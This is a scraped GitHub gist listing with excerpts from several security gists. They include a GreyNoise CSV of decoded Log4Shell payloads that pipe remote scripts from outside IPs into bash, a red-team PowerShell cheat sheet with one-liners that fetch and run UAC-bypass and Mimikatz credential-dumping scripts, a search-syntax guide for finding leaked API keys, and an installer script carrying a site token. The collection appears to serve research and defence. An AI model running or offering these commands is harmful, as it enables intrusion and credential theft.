Skip to content

Instantly share code, notes, and snippets.

View deprito's full-sized avatar

deprito

4 followers · 1 following
View GitHub Profile
@mjlcook
mjlcook / SonicWall%20Capture%20Client.3.7.6.sh
Created July 21, 2023 09:44
#!/bin/sh
S1_TOKEN=eyJ1cmwiOiAiaHR0cHM6Ly9zb25pY3dhbGwuc2VudGluZWxvbmUubmV0IiwgInNpdGVfa2V5IjogIjEwNGMyZDdkNTFiNDYzMGYifQ==
DOWNLOAD_URL=https://software.sonicwall.com/CaptureClient/SentinelOne/SentinelOne_linux_v22_3_3_11
PACKAGE_TYPE=sh
VERSION=3.7.6
RELEASE_GUID=4fd3e923-cb80-4abc-acf2-6faf1448536e
echo "SonicWall Capture Client for Linux Installer"
@win3zz
win3zz / GitHub-Leaked-API-Keys-and-Secrets.md
Last active May 14, 2024 17:10

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.

@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active May 14, 2024 11:08
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
@nathanqthai
nathanqthai / base64_payloads.csv
Last active October 14, 2023 13:21
GreyNoise Log4Shell Payloads
b64decoded hits
(curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash 2056
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash 162
(curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash 2
@jivoi
jivoi / RedTeam_CheatSheet.ps1
Created July 14, 2018 14:52 — forked from m8sec/RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@VAdamec
VAdamec / ossec_server.conf
Created October 20, 2015 06:07
Fluent setup for OSSEC (2.9, with json logging but with getting exact server name and log) not secure forward and also output to stdout
<source>
type tail
format json
path /var/ossec/logs/alerts/alerts.json
pos_file /var/log/td-agent/ossec_log_json.pos
tag ossec.process
</source>
<match ossec.process>
type parser